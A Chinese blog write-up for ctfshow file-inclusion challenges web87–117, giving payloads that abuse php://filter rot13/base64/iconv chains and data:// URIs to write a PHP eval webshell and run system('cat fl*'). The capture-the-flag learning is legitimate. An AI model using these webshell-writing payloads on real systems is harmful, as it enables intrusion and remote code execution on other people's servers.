ctfshow文件包含web87-117

最新推荐文章于 2024-12-09 18:23:22 发布
最新推荐文章于 2024-12-09 18:23:22 发布
阅读量619 收藏 1
点赞数
分类专栏: ctfshow通关 文章标签: php 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/131275491
版权
文章介绍了几种Web安全中常见的编码绕过技巧,如rot13和base64,用于规避过滤系统。同时,列举了CTF(CaptureTheFlag)挑战中的实例,包括利用dataURI、iconv转换来实现payload的传递。这些方法常用于解决文件包含漏洞问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.web87

在这里插入图片描述
绕过死亡待可以使用rot13编码,还可以用base64编码,url两次编码,浏览器自动进行解码一次,代码解码一次,如果之编码一次,代码会被浏览器解码一次,这时候特殊字符还是url编码,而如php字符串则被还原,然后就被过滤了
payload:

1.rot13绕过
#下放url编码为php://filter/write=string.rot13/resource=6.php的两次url编码
file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%65%25%37%32%25%36%66%25%37%34%25%33%31%25%33%33%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%36%25%32%65%25%37%30%25%36%38%25%37%30
#post传
content=<?cuc riny($_CBFG[1]);?>
#为<?php eval($_POST[1])?>
2.base64绕过
base64解码时会自动跳过不认识的字符,如空格,括号,中文等
<?php die('大佬别秀了');?>base64解码只解码phpdie,而base64是四个字符解码四个字符的,所以可以填充两个字符,造成php代码失效,而一句话木马能够解码成功
#file=php://filter/write=convert.base64-decode/resource=b.php两次url编码
%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%36%32%25%32%65%25%37%30%25%36%38%25%37%30
#post
content=11PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg==
#base64解码<?php @eval($_POST[1]);?>

2.web88

在这里插入图片描述
data没过滤,可以base64编码,注意不能出现=和+,被过滤了
payload:

file=data://text/plain;base64,PD9waHAgIGV2YWwoJF9QT1NUWzFdKSA7
base64为<?php  eval($_POST[1]) ;编码
1=system('cat fl*');

3.web116

是一个视频,下载下来,用010eidtor打开,在最后发现IEND®B,是一张png图片,用foremost还原出图片
foremost 1.mp4 -o 1 进入1.目录就可以找到png图片
在这里插入图片描述
file_get_contents是一个直接读取文件的函数,直接传入flag.php即可
payload:

view-source:http://65c6dc47-80df-4719-b3b2-31bb0932d99b.challenge.ctf.show/?file=flag.php

4.web117

在这里插入图片描述
绕过死亡待还有其他方式,convert.iconv.UCS-2LE.UCS-2BE两位两位的替换位置

payload:

file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=3.php
#post
?<hp pvela$(P_SO[T]1;)>?

ctfshow文件包含

CTFshow 文件包含 web117
Kradress的博客
12-12 890
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: yu22x # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-01 18:16:59 */ highlight_file(__FILE__); error_reporting(0); function filter($x){ if(preg_ma
CTFshow 文件包含 web87
Kradress的博客
12-12 2051
目录源码思路题解题解一题解二总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 21:57:55 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])
ctfshow web入门 web87
2401_83272517的博客
05-25 1238
入门2年半还没有入门的菜坤的日常wp
ctfshow-web入门117(绕过exit头部限制)
qq_44657899的博客
10-27 2042
源码如下: <?php /* # -*- coding: utf-8 -*- # @Author: yu22x # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-01 18:16:59 */ highlight_file(__FILE__); error_reporting(0); function filter($x){ if(preg_match('/ht
ctf show web87
2401_84499636的博客
12-03 528
对content传参,需要注意的是,前面的<?php die()?>中,我们是假设可以对其解码会成为phpdie,但是这里是6个字节被解码,但是base64解码是以4个字节为一组,所以我们还需要多给他两个字节,就是两个字符,因为传入内容是和后面的传入参数的值拼接而成的,所以我们可以在后面参数中的前两个字符随便写两个垃圾字符来帮助它能成功解码,避免解码出现问题,下面是演示对刚刚说的字符进行解码。来解码写入,这样文件的 die() 就会被 base64 过滤,这样 die() 函数就绕过了。
CTFshow web入门web87-文件包含10
weixin_74336671的博客
12-01 351
把data协议也ban了,换一种方式,不直接通过当前页面进行内容的传递,使用日志包含。通过wappalyzer查看网页的banner信息,发现是nginx服务器。本题的路径是/var/log/nginx/access.log.通过抓包在UA头中插入payload,文件包含日志使代码执行。通过file读取日志,发现内容为请求行、UA头、IP地址。
ctfshow_web入门_文件包含_web78~web117
qq_62989306的博客
09-13 930
文件包含php://filter伪协议、data协议、包含日志文件、session.upload_progress利用、条件竞争、死亡绕过……
ctfshow-web入门-文件包含web87)巧用 php://filter 流绕过死亡函数的三种方法
Welcome To Myon'Blog !
07-06 2016
但是我们传入的一句话木马也是 XML 标签,如何让它只去除 而不破坏我们传入的木马呢?我们可以先对一句话木马进行 base64 编码后传入,这样就不会受到strip_tags 函数的影响,当去除掉 后,由于 php://filter 允许使用多个过滤器,我们再调用 base64-decode 将一句话木马进行 base64 解码,实现还原。
ctfshow web入门 web87--web88&&web116--web117
2301_81040377的博客
04-04 908
content是写入内容,要进行base64编码 ,而base解码时,是4个一组,flag.php(要写入的文件),写入的内容<?整个函数调用的作用是将解码后的 $file 作为目标文件路径,然后将前面定义的终止执行提示语句与 $content 的内容拼接起来,一起写入到目标文件中。两次URL编码(浏览器(hackbar)一次,题目绕过一次)为。用php伪协议绕过但是常见的编码都被过滤这里有一种新的编码。php伪协议进行绕过(但是编码的时候必须绕过=和+)(工具用的bp的编码器,这个编码器我找了好久好久)
ctfshow 文件包含 web 78 -117
shinygod的博客
02-27 1546
目录web 78web 79web 80web 81web 82 web 78 data://text/plain,<?php system("cat flag.php");?> php://filter/convert.base64-encode/resource=flag.php web 79 file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= //PD9waHAgc3lzdGVtKCdjYXQgZmx
ctfshow学习记录-web入门(文件包含78-87
龟速更新的九某人
07-04 2425
ctfshow学习记录-web入门(文件包含web78-87
CTFshow 文件包含Web78-Web117
dasdasdasvsdV的博客
08-04 499
注意用法,allow_url_fopen和allow_url_include都满足的时候才可以用常用场景:文件包含、文本包含。
CTFshow_Web_文件包含——web78~88、116~117
Ho1aAs‘s Blog
04-26 1181
文章目录题解web78web79web80~81web82~86web87web88web116web117完 题解 LFI:Local File Include RFI:Remote File Include web78 php伪协议,使用php://filter,解码即可 [GET]PAYLOAD: ?file=php://filter/convert.base64-encode/resource=flag.php web79 过滤php,data伪协议,使用php://data,上传php代码打开f
ctf.show文件包含(web78-web117)
wanan的博客
08-31 514
ctf.show文件包含(web78-web117)
CTFshow--WEB入门--文件包含(78-88、116、117关)
2401_83504183的博客
12-09 2126
说明:本篇文章会不断更新,我是一个新手小白,对这里面的知识都是一边做题一边积累的,所以文章中会有很多关于解题的碎碎念。本篇文章继续通过文件包含的其他关卡,后续的部分会不断更新......
ctfshow-web入门-文件包含web88、web116、web117
Welcome To Myon'Blog !
07-06 1721
没有过滤冒号 : ,可以使用 data 协议,但是过滤了括号和等号,因此需要编码绕过一下。这里有点问题,我 ('ls') 后加上分号发现不行,可能是编码结果有加号,题目做了过滤去掉分号得到 PD9waHAgc3lzdGVtKCdscycpPz4=,传入时要把等号去掉,因为题目过滤掉了等号,否则会触发 die 函数,即使去掉等号,base64 解码也是
文件包含ctfshow web入门)
qq_47168481的博客
11-17 3474
web79 本题考察php伪协议中的其他方法,对php进行了过滤 if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); } 可以采用data伪协议 file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg== 后面的base64
CTFshow_web入门_文件包含(web78~web88)
monster663的博客
02-02 1144
web78 直接包含,如果不知道就去学习一下什么是文件包含 ?file=php://filter/read=convert.base64-encode/resource=flag.php web79 if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__FILE__);
ctfshow-web文件包含
m0_72898152的博客
02-06 956
ctf,ctfshow文件包含
ctfshow web入门 文件包含 87
最新发布
01-01
### CTFShow Web 入门 文件包含87关 解题思路 #### 关键点分析 在Web87关中,代码逻辑如下: 当`$_GET['file']`存在时,变量$file获取该参数值。随后,$file会经过一系列替换操作,将字符串中的特定字符替换成...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值